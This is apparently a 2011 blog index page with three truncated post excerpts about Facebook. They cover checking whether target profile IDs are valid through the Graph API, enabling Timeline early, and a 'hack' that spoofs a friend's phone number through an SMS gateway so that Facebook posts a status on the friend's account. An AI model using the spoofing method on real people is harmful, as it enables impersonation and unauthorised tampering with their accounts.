Just replace the id parameter with your own. One important thing is, the api returns false if the id is not valid. For example if you try to access id=1 the api will return false because that is not a valid facebook id. But if you change the parameter to 4 you can see the api will return above mentioned information of Mark Zuckerberg. Using this graph api I am going to check if the target profile ID is valid or not. You might think why I have used this api. This is true that same thing can be done by accessing http://www.facebook.com/1,2,3 bluh bluh … like this. My answer is ..Light weight of this api. So you don’t have to craft each and every http headers to check for valid profile id.

Another feature of graph is getting like and share counts of any link .Graph api returns the count of how many times a link is shared or liked on Facebook through JSON. You can do it in this way


Read More...

Friday, September 23, 2011

How To Enable Facebook Timeline Right This Second


This morning Facebook announced Timeline, a crazy (and kind of creepy) omnibus look at everything that has ever happened in your Facebook lifespan. It’s like a story book of your life — or at least the online, documented parts.
Facebook said that Timeline would be on the way for everyone sometime in the coming weeks… which is great and all, for everyone else. You’re the type of person who reads TechCrunch, and are thus likely the type of person who likes their new and shiny things right now.
That’s okay. We can make it happen.
Fortunately, enabling Timeline a bit early isn’t too difficult — but it’s not at all straight forward, either.
You see, Facebook is enabling Timeline early for open graph developers. You, too, can be an open graph developer — even if you’re just looking to dabble.

Read More...

Tuesday, July 19, 2011

||How to Hack Facebook Status||


Most of us know that Facebook allows us to update our status using our mobile phone. This feature is called Facebook Text. If you have Facebook Text enabled, you have to just type in the status and send this message to “923223265″ using your registered mobile phone. Facebook will automatically update your status.
So, in this Facebook hack, we will use SMSGlobal to change the status of your friend. SMSGlobal allows us to send message to any number from anyone’s number. That is, we will send Facebook a fake SMS from your friend’s registered mobile number.
Facebook will think that the message has been sent by your friend and his status will be updated according to the message contents sent by us. So, stop searching Google for “how do you hack a Facebook account” and simply follow the guidelines below.

Steps to be Followed
1. Go to SMSGlobal site and register for an account. Refer my previous article How to send Fake SMS for more information.
 
2. After logging in to your account, click on “Send SMS to a Number” to see the following screen:

Read More...